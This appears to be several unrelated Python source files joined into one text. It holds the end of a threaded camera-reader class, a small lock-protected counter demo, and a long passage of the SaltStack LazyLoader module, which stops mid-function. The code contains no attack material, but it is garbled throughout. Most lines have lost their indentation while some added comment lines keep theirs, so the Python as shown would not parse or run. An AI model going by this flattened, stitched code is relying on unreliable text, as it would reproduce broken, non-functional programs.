_, self.image = self.__frame.frame_to_image(self.frame2)
frame_dto = FrameDTO(self.source, self.frame1, self.frame2, self.image)
self.__process_frame.put_item(frame_dto)
def read(self) -> any:
try:
self.read_lock.acquire()
frame = self.image.copy()
except Exception as e:
frame = None
finally:
self.read_lock.release()
return frame
def stop(self) -> any:
try:
self.started = False
time.sleep(0.9)
if self.thread:
self.thread.join()
self.release()
self.__process_frame.stop()
except Exception as e:
print(e)
def release(self):
if self.stream:
self.stream.release()
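# Hedged usage sketch (not part of the original module): how a caller might drive CameraAsync.
# The source index 0 (default webcam) and the 2-second warm-up are illustrative assumptions.
if __name__ == "__main__":
    cam = CameraAsync(source=0, name='thread-stream-0')
    cam.initialize()                # opens the capture and the frame processor
    cam.start()                     # spawns the daemon reader thread
    time.sleep(2.0)                 # give the thread time to grab a few frames
    image = cam.read()              # latest processed image, or None if nothing was captured yet
    print('frame received' if image is not None else 'no frame yet')
    cam.stop()                      # stops the loop, joins the thread, releases the stream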
|
locked_ops_threads.py
|
import time
import threading
class SomeClass(object):
    def __init__(self, c):
        self.c = c
self.lock = threading.Lock()
def inc(self):
self.lock.acquire()
try:
            new = self.c + 1
            # if the thread were interrupted by another inc() call here, its result would be wrong
time.sleep(0.001) # sleep makes the os continue another thread
self.c = new
finally:
self.lock.release()
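    # Equivalent, more idiomatic form of the same critical section, using the lock as a
    # context manager (a sketch, not part of the original example):
    #
    #     def inc(self):
    #         with self.lock:        # acquired here, always released on exit
    #             new = self.c + 1
    #             time.sleep(0.001)  # still safe: other threads block on the lock
    #             self.c = new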
x = SomeClass(0)
threads = []
for _ in range(1000):
    t = threading.Thread(target=x.inc)
threads.append(t)
t.start()
for th in threads:
th.join()
print(x.c)  # with each increment protected by the lock, the final value is reliably 1000
|
lazy.py
|
import copy
import functools
import importlib
import importlib.machinery
import importlib.util
import inspect
import logging
import os
import pathlib
import re
import sys
import tempfile
import threading
import time
import traceback
import types
from collections.abc import MutableMapping
from zipimport import zipimporter
import salt.config
import salt.defaults.events
import salt.defaults.exitcodes
import salt.loader.context
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.lazy
import salt.utils.odict
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.versions
from salt.utils.decorators import Depends
try:
# Try the stdlib C extension first
import _contextvars as contextvars
except ImportError:
# Py<3.7
import contextvars
log = logging.getLogger(__name__)
# pylint: disable=no-member
MODULE_KIND_SOURCE = 1
MODULE_KIND_COMPILED = 2
MODULE_KIND_EXTENSION = 3
MODULE_KIND_PKG_DIRECTORY = 5
SUFFIXES = []
for suffix in importlib.machinery.EXTENSION_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_EXTENSION))
for suffix in importlib.machinery.SOURCE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_SOURCE))
for suffix in importlib.machinery.BYTECODE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_COMPILED))
MODULE_KIND_MAP = {
MODULE_KIND_SOURCE: importlib.machinery.SourceFileLoader,
MODULE_KIND_COMPILED: importlib.machinery.SourcelessFileLoader,
MODULE_KIND_EXTENSION: importlib.machinery.ExtensionFileLoader,
}
# pylint: enable=no-member
SALT_BASE_PATH = pathlib.Path(salt.syspaths.INSTALL_DIR).resolve()
LOADED_BASE_NAME = "salt.loaded"
PY3_PRE_EXT = re.compile(r"\.cpython-{}{}(\.opt-[1-9])?".format(*sys.version_info[:2]))
# Will be set to pyximport module at runtime if cython is enabled in config.
pyximport = None
def _generate_module(name):
if name in sys.modules:
return
code = "'''Salt loaded {} parent module'''".format(name.split(".")[-1])
# ModuleType can't accept a unicode type on PY2
module = types.ModuleType(str(name))
exec(code, module.__dict__)
sys.modules[name] = module
def _mod_type(module_path):
if module_path.startswith(str(SALT_BASE_PATH)):
return "int"
return "ext"
class FilterDictWrapper(MutableMapping):
"""
Create a dict which wraps another dict with a specific key suffix on get
This is to replace "filter_load"
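    Example (illustrative names, not from the original docs)::
        wrapped = FilterDictWrapper({"foo_filter": render_func}, "_filter")
        wrapped["foo"]   # looks up "foo" + "_filter" in the wrapped dict
        list(wrapped)    # -> ["foo"]  (the suffix is stripped on iteration)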
"""
def __init__(self, d, suffix):
self._dict = d
self.suffix = suffix
def __setitem__(self, key, val):
self._dict[key] = val
def __delitem__(self, key):
del self._dict[key]
def __getitem__(self, key):
return self._dict[key + self.suffix]
def __len__(self):
return len(self._dict)
def __iter__(self):
for key in self._dict:
if key.endswith(self.suffix):
yield key.replace(self.suffix, "")
class LoadedFunc:
"""
The functions loaded by LazyLoader instances using subscript notation
'a[k]' will be wrapped with LoadedFunc.
- Makes sure functions are called with the correct loader's context.
- Provides access to a wrapped func's __global__ attribute
:param func callable: The callable to wrap.
:param dict loader: The loader to use in the context when the wrapped callable is called.
"""
def __init__(self, func, loader):
self.func = func
self.loader = loader
functools.update_wrapper(self, func)
def __getattr__(self, name):
return getattr(self.func, name)
def __call__(self, *args, **kwargs):
if self.loader.inject_globals:
run_func = global_injector_decorator(self.loader.inject_globals)(self.func)
else:
run_func = self.func
return self.loader.run(run_func, *args, **kwargs)
class LoadedMod:
def __init__(self, mod, loader):
"""
Return the wrapped func's globals via this object's __globals__
attribute.
"""
self.mod = mod
self.loader = loader
def __getattr__(self, name):
"""
Run the wrapped function in the loader's context.
"""
attr = getattr(self.mod, name)
if inspect.isfunction(attr) or inspect.ismethod(attr):
return LoadedFunc(attr, self.loader)
return attr
class LazyLoader(salt.utils.lazy.LazyDict):
"""
    A pseudo-dictionary which has a set of keys which are the
    name of the module and function, delimited by a dot. When
    the value of a key is accessed, the function is loaded
    from disk into memory.
.. note::
Iterating over keys will cause all modules to be loaded.
:param list module_dirs: A list of directories on disk to search for modules
:param dict opts: The salt options dictionary.
:param str tag: The tag for the type of module to load
:param func mod_type_check: A function which can be used to verify files
:param dict pack: A dictionary of function to be packed into modules as they are loaded
:param list whitelist: A list of modules to whitelist
    :param bool virtual_enable: Whether or not to respect the __virtual__ function when loading modules.
        If not true, the module will not load.
    :param str virtual_funcs: The name of additional functions in the module to call to verify its functionality.
:param list extra_module_dirs: A list of directories that will be able to import from
:param str pack_self: Pack this module into a variable by this name into modules loaded
:returns: A LazyLoader object which functions as a dictionary. Keys are 'module.function' and values
are function references themselves which are loaded on-demand.
# TODO:
- move modules_max_memory into here
- singletons (per tag)
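    A hedged usage sketch (the config path and module dir below are illustrative, not prescribed
    by this class)::
        import salt.config
        opts = salt.config.minion_config("/etc/salt/minion")
        loader = LazyLoader(["/path/to/extension_modules"], opts=opts, tag="module")
        loader["test.ping"]()  # the 'test' module is loaded lazily on first access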
"""
mod_dict_class = salt.utils.odict.OrderedDict
def __init__(
self,
module_dirs,
opts=None,
tag="module",
loaded_base_name=None,
mod_type_check=None,
pack=None,
whitelist=None,
virtual_enable=True,
static_modules=None,
proxy=None,
virtual_funcs=None,
extra_module_dirs=None,
pack_self=None,
): # pylint: disable=W0231
"""
In pack, if any of the values are None they will be replaced with an
empty context-specific dict
"""
self.parent_loader = None
self.inject_globals = {}
self.pack = {} if pack is None else pack
for i in self.pack:
if isinstance(self.pack[i], salt.loader.context.NamedLoaderContext):
self.pack[i] = self.pack[i].value()
if opts is None:
opts = {}
opts = copy.deepcopy(opts)
for i in ["pillar", "grains"]:
if i in opts and isinstance(
opts[i], salt.loader.context.NamedLoaderContext
):
opts[i] = opts[i].value()
threadsafety = not opts.get("multiprocessing")
self.context_dict = salt.utils.context.ContextDict(threadsafe=threadsafety)
self.opts = self.__prep_mod_opts(opts)
self.pack_self = pack_self
self.module_dirs = module_dirs
self.tag = tag
self._gc_finalizer = None
if loaded_base_name and loaded_base_name != LOADED_BASE_NAME:
self.loaded_base_name = loaded_base_name
else:
self.loaded_base_name = LOADED_BASE_NAME
self.mod_type_check = mod_type_check or _mod_type
if "__context__" not in self.pack:
self.pack["__context__"] = None
for k, v in self.pack.items():
if v is None: # if the value of a pack is None, lets make an empty dict
self.context_dict.setdefault(k, {})
self.pack[k] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, k
)
self.whitelist = whitelist
self.virtual_enable = virtual_enable
self.initial_load = True
# names of modules that we don't have (errors, __virtual__, etc.)
self.missing_modules = {} # mapping of name -> error
self.loaded_modules = {} # mapping of module_name -> dict_of_functions
self.loaded_files = set() # TODO: just remove them from file_mapping?
self.static_modules = static_modules if static_modules else []
if virtual_funcs is None:
virtual_funcs = []
self.virtual_funcs = virtual_funcs
self.extra_module_dirs = extra_module_dirs if extra_module_dirs else []
self._clean_module_dirs = []
self.disabled = set(
self.opts.get(
"disable_{}{}".format(self.tag, "" if self.tag[-1] == "s" else "s"),
[],
)
)
# A map of suffix to description for imp
self.suffix_map = {}
# A list to determine precedence of extensions
# Prefer packages (directories) over modules (single files)!
self.suffix_order = [""]
for (suffix, mode, kind) in SUFFIXES:
self.suffix_map[suffix] = (suffix, mode, kind)
self.suffix_order.append(suffix)
self._lock = threading.RLock()
with self._lock:
self._refresh_file_mapping()
super().__init__() # late init the lazy loader
# create all of the import namespaces
_generate_module("{}.int".format(self.loaded_base_name))
_generate_module("{}.int.{}".format(self.loaded_base_name, tag))
_generate_module("{}.ext".format(self.loaded_base_name))
_generate_module("{}.ext.{}".format(self.loaded_base_name, tag))
def clean_modules(self):
"""
Clean modules
"""
for name in list(sys.modules):
if name.startswith(self.loaded_base_name):
del sys.modules[name]
def __getitem__(self, item):
"""
Override the __getitem__ in order to decorate the returned function if we need
to last-minute inject globals
"""
func = super().__getitem__(item)
return LoadedFunc(func, self)
def __getattr__(self, mod_name):
"""
Allow for "direct" attribute access-- this allows jinja templates to
access things like `salt.test.ping()`
"""
if mod_name in ("__getstate__", "__setstate__"):
return object.__getattribute__(self, mod_name)
        # if we have an attribute named that, let's return it.
try:
return object.__getattr__(self, mod_name) # pylint: disable=no-member
except AttributeError:
pass
        # otherwise we assume it's jinja template access
if mod_name not in self.loaded_modules and not self.loaded:
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and mod_name in self.loaded_modules:
break
if mod_name in self.loaded_modules:
return LoadedMod(self.loaded_modules[mod_name], self)
else:
raise AttributeError(mod_name)
def missing_fun_string(self, function_name):
"""
Return the error string for a missing function.
        This can range from "not available" to "__virtual__ returned False".
"""
mod_name = function_name.split(".")[0]
if mod_name in self.loaded_modules:
return "'{}' is not available.".format(function_name)
else:
try:
reason = self.missing_modules[mod_name]
except KeyError:
return "'{}' is not available.".format(function_name)
else:
if reason is not None:
return "'{}' __virtual__ returned False: {}".format(
mod_name, reason
)
else:
return "'{}' __virtual__ returned False".format(mod_name)
def _refresh_file_mapping(self):
"""
refresh the mapping of the FS on disk
"""
# map of suffix to description for imp
if (
self.opts.get("cython_enable", True) is True
and ".pyx" not in self.suffix_map
):
try:
global pyximport
pyximport = __import__("pyximport") # pylint: disable=import-error
pyximport.install()
# add to suffix_map so file_mapping will pick it up
self.suffix_map[".pyx"] = tuple()
if ".pyx" not in self.suffix_order:
self.suffix_order.append(".pyx")
except ImportError:
log.info(
"Cython is enabled in the options but not present "
"in the system path. Skipping Cython modules."
)
# Allow for zipimport of modules
if (
self.opts.get("enable_zip_modules", True) is True
and ".zip" not in self.suffix_map
):
self.suffix_map[".zip"] = tuple()
if ".zip" not in self.suffix_order:
self.suffix_order.append(".zip")
# allow for module dirs
self.suffix_map[""] = ("", "", MODULE_KIND_PKG_DIRECTORY)
# create mapping of filename (without suffix) to (path, suffix)
# The files are added in order of priority, so order *must* be retained.
self.file_mapping = salt.utils.odict.OrderedDict()
opt_match = []
def _replace_pre_ext(obj):
"""
Hack so we can get the optimization level that we replaced (if
any) out of the re.sub call below. We use a list here because
it is a persistent data structure that we will be able to
access after re.sub is called.
"""
opt_match.append(obj)
return ""
for mod_dir in self.module_dirs:
try:
# Make sure we have a sorted listdir in order to have
# expectable override results
files = sorted(x for x in os.listdir(mod_dir) if x != "__pycache__")
except OSError:
continue # Next mod_dir
try:
pycache_files = [
os.path.join("__pycache__", x)
for x in sorted(os.listdir(os.path.join(mod_dir, "__pycache__")))
]
except OSError:
pass
else:
files.extend(pycache_files)
for filename in files:
try:
dirname, basename = os.path.split(filename)
if basename.startswith("_"):
# skip private modules
                        # (detailed log messages omitted here for brevity)
continue # Next filename
f_noext, ext = os.path.splitext(basename)
f_noext = PY3_PRE_EXT.sub(_replace_pre_ext, f_noext)
try:
opt_level = int(opt_match.pop().group(1).rsplit("-", 1)[-1])
except (AttributeError, IndexError, ValueError):
# No regex match or no optimization level matched
opt_level = 0
try:
opt_index = self.opts["optimization_order"].index(opt_level)
                    except (KeyError, ValueError):  # option missing, or level not listed in it
log.trace(
"Disallowed optimization level %d for module "
"name '%s', skipping. Add %d to the "
"'optimization_order' config option if you "
"do not want to ignore this optimization "
"level.",
opt_level,
f_noext,
opt_level,
)
continue
# make sure it is a suffix we support
if ext not in self.suffix_map:
continue # Next filename
if f_noext in self.disabled:
log.trace(
"Skipping %s, it is disabled by configuration", filename
)
continue # Next filename
fpath = os.path.join(mod_dir, filename)
                    # if it's a directory, allow loading it as a package
if ext == "":
# is there something __init__?
subfiles = os.listdir(fpath)
for suffix in self.suffix_order:
if "" == suffix:
continue # Next suffix (__init__ must have a suffix)
init_file = "__init__{}".format(suffix)
if init_file in subfiles:
break
else:
continue # Next filename
try:
curr_ext = self.file_mapping[f_noext][1]
curr_opt_index = self.file_mapping[f_noext][2]
except KeyError:
pass
else:
if "" in (curr_ext, ext) and curr_ext != ext:
log.error(
"Module/package collision: '%s' and '%s'",
fpath,
self.file_mapping[f_noext][0],
)
if ext == ".pyc" and curr_ext == ".pyc":
# Check the optimization level
if opt_index >= curr_opt_index:
# Module name match, but a higher-priority
# optimization level was already matched, skipping.
continue
elif not curr_ext or self.suffix_order.index(
ext
) >= self.suffix_order.index(curr_ext):
                            # Match found but a higher-priority match already
                            # exists, so skip this.
continue
if not dirname and ext == ".pyc":
# On Python 3, we should only load .pyc files from the
# __pycache__ subdirectory (i.e. when dirname is not an
# empty string).
continue
# Made it this far - add it
self.file_mapping[f_noext] = (fpath, ext, opt_index)
except OSError:
continue
for smod in self.static_modules:
f_noext = smod.split(".")[-1]
self.file_mapping[f_noext] = (smod, ".o", 0)
def clear(self):
"""
Clear the dict
"""
with self._lock:
super().clear() # clear the lazy loader
self.loaded_files = set()
self.missing_modules = {}
self.loaded_modules = {}
# if we have been loaded before, lets clear the file mapping since
# we obviously want a re-do
if hasattr(self, "opts"):
self._refresh_file_mapping()
self.initial_load = False
def __prep_mod_opts(self, opts):
"""
Strip out of the opts any logger instance
"""
if "__grains__" not in self.pack:
grains = opts.get("grains", {})
if isinstance(grains, salt.loader.context.NamedLoaderContext):
grains = grains.value()
self.context_dict["grains"] = grains
self.pack["__grains__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "grains"
)
if "__pillar__" not in self.pack:
pillar = opts.get("pillar", {})
if isinstance(pillar, salt.loader.context.NamedLoaderContext):
pillar = pillar.value()
self.context_dict["pillar"] = pillar
self.pack["__pillar__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "pillar"
)
mod_opts = {}
for key, val in list(opts.items()):
if key == "logger":
continue
mod_opts[key] = val
return mod_opts
def _iter_files(self, mod_name):
"""
Iterate over all file_mapping files in order of closeness to mod_name
"""
# do we have an exact match?
if mod_name in self.file_mapping:
yield mod_name
# do we have a partial match?
for k in self.file_mapping:
if mod_name in k:
yield k
# anyone else? Bueller?
for k in self.file_mapping:
if mod_name not in k:
yield k
def _reload_submodules(self, mod):
submodules = (
getattr(mod, sname)
for sname in dir(mod)
if isinstance(getattr(mod, sname), mod.__class__)
)
# reload only custom "sub"modules
for submodule in submodules:
# it is a submodule if the name is in a namespace under mod
if submodule.__name__.startswith(mod.__name__ + "."):
importlib.reload(submodule)
self._reload_submodules(submodule)
def __populate_sys_path(self):
for directory in self.extra_module_dirs:
if directory not in sys.path:
sys.path.append(directory)
self._clean_module_dirs.append(directory)
def __clean_sys_path(self):
invalidate_path_importer_cache = False
for directory in self._clean_module_dirs:
if directory in sys.path:
sys.path.remove(directory)
invalidate_path_importer_cache = True
self._clean_module_dirs = []
        # Be sure that sys.path_importer_cache does not contain any
        # invalid FileFinder references
        importlib.invalidate_caches()
        # Because we are tampering with importlib, we can occasionally hit an
        # invalidation issue with sys.path_importer_cache that requires removing
        # FileFinder entries which remain None for the extra_module_dirs
if invalidate_path_importer_cache:
for directory in self.extra_module_dirs:
if (
directory in sys.path_importer_cache
and sys.path_importer_cache[directory] is None
):
del sys.path_importer_cache[directory]
def _load_module(self, name):
mod = None
fpath, suffix = self.file_mapping[name][:2]
# if the fpath has `.cpython-3x` in it, but the running Py version
# is 3.y, the following will cause us to return immediately and we won't try to import this .pyc.
# This is for the unusual case where several Python versions share a single
# source tree and drop their .pycs in the same __pycache__ folder.
# If we were to load a .pyc for another Py version it's not a big problem
# but the log will get spammed with "Bad Magic Number" messages that
# can be very misleading if the user is debugging another problem.
try:
(implementation_tag, cache_tag_ver) = sys.implementation.cache_tag.split(
"-"
)
if cache_tag_ver not in fpath and implementation_tag in fpath:
log.trace(
"Trying to load %s on %s, returning False.",
fpath,
sys.implementation.cache_tag,
)
return False
except AttributeError:
# Most likely Py 2.7 or some other Python version we don't really support
pass
self.loaded_files.add(name)
fpath_dirname = os.path.dirname(fpath)
try:
self.__populate_sys_path()
sys.path.append(fpath_dirname)
if suffix == ".pyx":
mod = pyximport.load_module(name, fpath, tempfile.gettempdir())
elif suffix == ".o":
top_mod = __import__(fpath, globals(), locals(), [])
comps = fpath.split(".")
if len(comps) < 2:
mod = top_mod
else:
mod = top_mod
for subname in comps[1:]:
mod = getattr(mod, subname)
elif suffix == ".zip":
mod = zipimporter(fpath).load_module(name)
else:
desc = self.suffix_map[suffix]
# if it is a directory, we don't open a file
try:
mod_namespace = ".".join(
(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
)
except TypeError:
mod_namespace = "{}.{}.{}.{}".format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
if suffix == "":
# pylint: disable=no-member
# Package directory, look for __init__
loader_details = [
(
importlib.machinery.SourceFileLoader,
importlib.machinery.SOURCE_SUFFIXES,
),
(
importlib.machinery.SourcelessFileLoader,
importlib.machinery.BYTECODE_SUFFIXES,
),
(
importlib.machinery.ExtensionFileLoader,
importlib.machinery.EXTENSION_SUFFIXES,
),
]
file_finder = importlib.machinery.FileFinder(
fpath_dirname, *loader_details
)
spec = file_finder.find_spec(mod_namespace)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = spec.loader.load_module()
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
# reload all submodules if necessary
if not self.initial_load:
self._reload_submodules(mod)
else:
# pylint: disable=no-member
loader = MODULE_KIND_MAP[desc[2]](mod_namespace, fpath)
spec = importlib.util.spec_from_file_location(
mod_namespace, fpath, loader=loader
)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = self.run(spec.loader.load_module)
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
except OSError:
raise
except ImportError as exc:
if "magic number" in str(exc):
error_msg = (
"Failed to import {} {}. Bad magic number. If migrating from"
" Python2 to Python3, remove all .pyc files and try again.".format(
self.tag, name
)
)
log.warning(error_msg)
self.missing_modules[name] = error_msg
log.debug("Failed to import %s %s:\n", self.tag, name, exc_info=True)
self.missing_modules[name] = exc
return False
except Exception as error: # pylint: disable=broad-except
log.error(
"Failed to import %s %s, this is due most likely to a syntax error:\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
except SystemExit as error:
try:
fn_, _, caller, _ = traceback.extract_tb(sys.exc_info()[2])[-1]
except Exception: # pylint: disable=broad-except
pass
else:
tgt_fns = [
os.path.join("salt", "utils", "process.py"),
os.path.join("salt", "cli", "daemons.py"),
os.path.join("salt", "cli", "api.py"),
]
for tgt_fn in tgt_fns:
if fn_.endswith(tgt_fn) and "_handle_signals" in caller:
                        # Race condition, SIGTERM or SIGINT received while loader
# was in process of loading a module. Call sys.exit to
# ensure that the process is killed.
sys.exit(salt.defaults.exitcodes.EX_OK)
log.error(
"Failed to import %s %s as the module called exit()\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
finally:
sys.path.remove(fpath_dirname)
self.__clean_sys_path()
loader_context = salt.loader.context.LoaderContext()
if hasattr(mod, "__salt_loader__"):
if not isinstance(mod.__salt_loader__, salt.loader.context.LoaderContext):
log.warning("Override __salt_loader__: %s", mod)
mod.__salt_loader__ = loader_context
else:
mod.__salt_loader__ = loader_context
if hasattr(mod, "__opts__"):
if not isinstance(mod.__opts__, salt.loader.context.NamedLoaderContext):
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = copy.deepcopy(mod.__opts__)
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
else:
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = {}
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
# pack whatever other globals we were asked to
for p_name, p_value in self.pack.items():
mod_named_context = getattr(mod, p_name, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(p_name, default)
if mod_named_context is None:
setattr(mod, p_name, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", p_name, mod)
setattr(mod, p_name, named_context)
else:
setattr(mod, p_name, named_context)
if self.pack_self is not None:
mod_named_context = getattr(mod, self.pack_self, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(self.pack_self, default)
if mod_named_context is None:
setattr(mod, self.pack_self, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", self.pack_self, mod)
setattr(mod, self.pack_self, named_context)
else:
setattr(mod, self.pack_self, named_context)
module_name = mod.__name__.rsplit(".", 1)[-1]
# Call a module's initialization method if it exists
module_init = getattr(mod, "__init__", None)
if inspect.isfunction(module_init):
try:
self.run(module_init, self.opts)
except TypeError as e:
log.error(e)
except Exception: # pylint: disable=broad-except
err_string = "__init__ failed"
log.debug(
"Error loading %s.%s: %s",
self.tag,
module_name,
err_string,
exc_info=True,
)
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
# if virtual modules are enabled, we need to look for the
# __virtual__() function inside that module and run it.
if self.virtual_enable:
virtual_funcs_to_process = ["__virtual__"] + self.virtual_funcs
for virtual_func in virtual_funcs_to_process:
(
virtual_ret,
module_name,
virtual_err,
virtual_aliases,
) = self._process_virtual(mod, module_name, virtual_func)
if virtual_err is not None:
log.trace(
"Error loading %s.%s: %s", self.tag, module_name, virtual_err
)
# if _process_virtual returned a non-True value then we are
# supposed to not process this module
if virtual_ret is not True and module_name not in self.missing_modules:
# If a module has information about why it could not be loaded, record it
self.missing_modules[module_name] = virtual_err
self.missing_modules[name] = virtual_err
return False
else:
virtual_aliases = ()
# If this is a proxy minion then MOST modules cannot work. Therefore, require that
# any module that does work with salt-proxy-minion define __proxyenabled__ as a list
# containing the names of the proxy types that the module supports.
#
# Render modules and state modules are OK though
if "proxy" in self.opts:
if self.tag in ["grains", "proxy"]:
if not hasattr(mod, "__proxyenabled__") or (
self.opts["proxy"]["proxytype"] not in mod.__proxyenabled__
and "*" not in mod.__proxyenabled__
):
err_string = "not a proxy_minion enabled module"
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
if getattr(mod, "__load__", False) is not False:
log.info(
"The functions from module '%s' are being loaded from the "
"provided __load__ attribute",
module_name,
)
# If we had another module by the same virtual name, we should put any
# new functions under the existing dictionary.
mod_names = [module_name] + list(virtual_aliases)
mod_dict = {
x: self.loaded_modules.get(x, self.mod_dict_class()) for x in mod_names
}
for attr in getattr(mod, "__load__", dir(mod)):
if attr.startswith("_"):
# private functions are skipped
continue
func = getattr(mod, attr)
if not inspect.isfunction(func) and not isinstance(func, functools.partial):
# Not a function!? Skip it!!!
continue
# Let's get the function name.
# If the module has the __func_alias__ attribute, it must be a
            # dictionary mapping in the form of (key -> value):
# <real-func-name> -> <desired-func-name>
#
            # It defaults, of course, to the found callable attribute name
# if no alias is defined.
funcname = getattr(mod, "__func_alias__", {}).get(attr, attr)
for tgt_mod in mod_names:
try:
full_funcname = ".".join((tgt_mod, funcname))
except TypeError:
full_funcname = "{}.{}".format(tgt_mod, funcname)
# Save many references for lookups
# Careful not to overwrite existing (higher priority) functions
if full_funcname not in self._dict:
self._dict[full_funcname] = func
if funcname not in mod_dict[tgt_mod]:
setattr(mod_dict[tgt_mod], funcname, func)
mod_dict[tgt_mod][funcname] = func
self._apply_outputter(func, mod)
# enforce depends
try:
Depends.enforce_dependencies(self._dict, self.tag, name)
except RuntimeError as exc:
log.info(
"Depends.enforce_dependencies() failed for the following reason: %s",
exc,
)
for tgt_mod in mod_names:
self.loaded_modules[tgt_mod] = mod_dict[tgt_mod]
return True
def _load(self, key):
"""
Load a single item if you have it
"""
# if the key doesn't have a '.' then it isn't valid for this mod dict
if not isinstance(key, str):
raise KeyError("The key must be a string.")
if "." not in key:
raise KeyError("The key '{}' should contain a '.'".format(key))
mod_name, _ = key.split(".", 1)
with self._lock:
# It is possible that the key is in the dictionary after
# acquiring the lock due to another thread loading it.
if mod_name in self.missing_modules or key in self._dict:
return True
# if the modulename isn't in the whitelist, don't bother
if self.whitelist and mod_name not in self.whitelist:
log.error(
"Failed to load function %s because its module (%s) is "
"not in the whitelist: %s",
key,
mod_name,
self.whitelist,
)
raise KeyError(key)
def _inner_load(mod_name):
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and key in self._dict:
return True
return False
# try to load the module
ret = None
reloaded = False
# re-scan up to once, IOErrors or a failed load cause re-scans of the
# filesystem
while True:
try:
ret = _inner_load(mod_name)
if not reloaded and ret is not True:
self._refresh_file_mapping()
reloaded = True
continue
break
except OSError:
if not reloaded:
self._refresh_file_mapping()
reloaded = True
continue
return ret
def _load_all(self):
"""
Load all of them
"""
with self._lock:
for name in self.file_mapping:
if name in self.loaded_files or name in self.missing_modules:
continue
self._load_module(name)
self.loaded = True
def reload_modules(self):
with self._lock:
self.loaded_files = set()
self._load_all()
def _apply_outputter(self, func, mod):
"""
Apply the __outputter__ variable to the functions
"""
if hasattr(mod, "__outputter__"):
outp = mod.__outputter__
if func.__name__ in outp:
func.__outputter__ = outp[func.__name__]
def _process_virtual(self, mod, module_name, virtual_func="__virtual__"):
"""
Given a loaded module and its default name determine its virtual name
This function returns a tuple. The first value will be either True or
False and will indicate if the module should be loaded or not (i.e. if
        it threw an exception while processing its __virtual__ function). The
second value is the determined virtual name, which may be the same as
the value provided.
The default name can be calculated as follows::
module_name = mod.__name__.rsplit('.', 1)[-1]
"""
# The __virtual__ function will return either a True or False value.
# If it returns a True value it can also set a module level attribute
# named __virtualname__ with the name that the module should be
# referred to as.
#
# This allows us to have things like the pkg module working on all
# platforms under the name 'pkg'. It also allows for modules like
# augeas_cfg to be referred to as 'augeas', which would otherwise have
# namespace collisions. And finally it allows modules to return False
# if they are not intended to run on the given platform or are missing
# dependencies.
virtual_aliases = getattr(mod, "__virtual_aliases__", tuple())
try:
error_reason = None
if hasattr(mod, "__virtual__") and inspect.isfunction(mod.__virtual__):
try:
start = time.time()
virtual_attr = getattr(mod, virtual_func)
virtual = self.run(virtual_attr)
if isinstance(virtual, tuple):
error_reason = virtual[1]
virtual = virtual[0]
if self.opts.get("virtual_timer", False):
end = time.time() - start
msg = "Virtual function took {} seconds for {}".format(
end, module_name
)
log.warning(msg)
except Exception as exc: # pylint: disable=broad-except
error_reason = (
"Exception raised when processing __virtual__ function"
" for {}. Module will not be loaded: {}".format(
mod.__name__, exc
)
)
log.error(error_reason, exc_info_on_loglevel=logging.DEBUG)
virtual = None
# Get the module's virtual name
virtualname = getattr(mod, "__virtualname__", virtual)
if not virtual:
# if __virtual__() evaluates to False then the module
# wasn't meant for this platform or it's not supposed to
# load for some other reason.
# Some modules might accidentally return None and are
# improperly loaded
if virtual is None:
log.warning(
"%s.__virtual__() is wrongly returning `None`. "
"It should either return `True`, `False` or a new "
"name. If you're the developer of the module "
"'%s', please fix this.",
mod.__name__,
module_name,
)
return (False, module_name, error_reason, virtual_aliases)
# At this point, __virtual__ did not return a
# boolean value, let's check for deprecated usage
# or module renames
if virtual is not True and module_name != virtual:
# The module is renaming itself. Updating the module name
# with the new name
log.trace("Loaded %s as virtual %s", module_name, virtual)
if virtualname != virtual:
# The __virtualname__ attribute does not match what's
# being returned by the __virtual__() function. This
# should be considered an error.
log.error(
"The module '%s' is showing some bad usage. Its "
"__virtualname__ attribute is set to '%s' yet the "
"__virtual__() function is returning '%s'. These "
"values should match!",
mod.__name__,
virtualname,
virtual,
)
module_name = virtualname
# If the __virtual__ function returns True and __virtualname__
# is set then use it
elif virtual is True and virtualname != module_name:
if virtualname is not True:
module_name = virtualname
except KeyError:
# Key errors come out of the virtual function when passing
# in incomplete grains sets, these can be safely ignored
# and logged to debug, still, it includes the traceback to
# help debugging.
